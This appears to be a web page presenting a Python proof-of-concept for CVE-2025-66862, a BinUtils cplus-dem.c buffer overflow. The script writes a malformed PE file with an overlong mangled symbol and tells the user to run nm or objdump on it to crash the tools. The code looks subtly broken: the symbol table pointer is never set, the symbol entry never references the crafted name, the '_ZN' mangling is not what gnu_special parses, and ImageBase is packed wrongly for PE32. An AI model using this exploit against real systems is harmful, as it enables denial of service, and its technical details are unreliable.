CVE-2025-66862 BinUtils cplus-dem.c缓冲区溢出拒绝服务漏洞

#!/usr/bin/env python3 """ CVE-2025-66862 PoC - BinUtils cplus-dem.c Buffer Overflow This PoC generates a malformed PE file that triggers buffer overflow in gnu_special function when processed by BinUtils tools. """ import struct import sys def create_malformed_pe_with_overflow(): """ Create a PE file with crafted C++ mangled symbol that triggers gnu_special buffer overflow in BinUtils 2.26 """ # PE DOS Header dos_header = bytearray(64) dos_header[0:2] = b'MZ' # DOS signature struct.pack_into('<H', dos_header, 60, 64) # e_lfanew offset # PE Signature pe_sig = b'PE\x00\x00' # COFF Header coff_header = bytearray(20) struct.pack_into('<H', coff_header, 0, 0x014c) # Machine: i386 struct.pack_into('<H', coff_header, 2, 1) # NumberOfSections struct.pack_into('<I', coff_header, 12, 224) # SizeOfOptionalHeader struct.pack_into('<H', coff_header, 16, 0x0102) # Characteristics # Optional Header (Minimal) optional_header = bytearray(224) struct.pack_into('<H', optional_header, 0, 0x010b) # Magic: PE32 struct.pack_into('<I', optional_header, 16, 0x1000) # SizeOfCode struct.pack_into('<I', optional_header, 20, 0x1000) # BaseOfCode struct.pack_into('<Q', optional_header, 24, 0x400000) # ImageBase struct.pack_into('<I', optional_header, 32, 0x1000) # SectionAlignment struct.pack_into('<I', optional_header, 36, 0x200) # FileAlignment struct.pack_into('<I', optional_header, 56, 0x10000) # SizeOfImage # Section Header (.text) section_header = bytearray(40) section_header[0:8] = b'.text\x00\x00\x00' struct.pack_into('<I', section_header, 8, 0x1000) # VirtualSize struct.pack_into('<I', section_header, 12, 0x1000) # VirtualAddress struct.pack_into('<I', section_header, 16, 0x200) # SizeOfRawData struct.pack_into('<I', section_header, 20, 0x200) # PointerToRawData struct.pack_into('<I', section_header, 36, 0x60000020) # Characteristics # Crafted symbol table with overflow trigger # The mangled name triggers gnu_special buffer handling issue overflow_trigger = b'_ZN' + b'A' * 1000 + b'E' # Overly long mangled name # Symbol table entry symbol_table = bytearray(18) struct.pack_into('<I', symbol_table, 0, 0) # Name (offset to string) struct.pack_into('<I', symbol_table, 4, 0) # Value struct.pack_into('<H', symbol_table, 8, 0) # SectionNumber struct.pack_into('<H', symbol_table, 10, 0) # Type struct.pack_into('<B', symbol_table, 12, 8) # StorageClass struct.pack_into('<B', symbol_table, 13, 0) # NumberOfAuxSymbols # String table (starts after symbol table) string_table = overflow_trigger + b'\x00' # Combine all parts pe_file = dos_header pe_file += pe_sig pe_file += coff_header pe_file += optional_header pe_file += section_header pe_file += b'\x00' * 0x200 # Padding to file alignment pe_file += symbol_table pe_file += string_table return bytes(pe_file) def main(): print("[*] Generating CVE-2025-66862 PoC PE file...") pe_data = create_malformed_pe_with_overflow() output_file = "cve-2025-66862-poc.exe" with open(output_file, 'wb') as f: f.write(pe_data) print(f"[+] PoC file created: {output_file}") print("[*] To trigger the vulnerability, run:") print(f" nm {output_file}") print(f" objdump -t {output_file}") print("[*] This should cause BinUtils to crash due to buffer overflow") if __name__ == "__main__": main()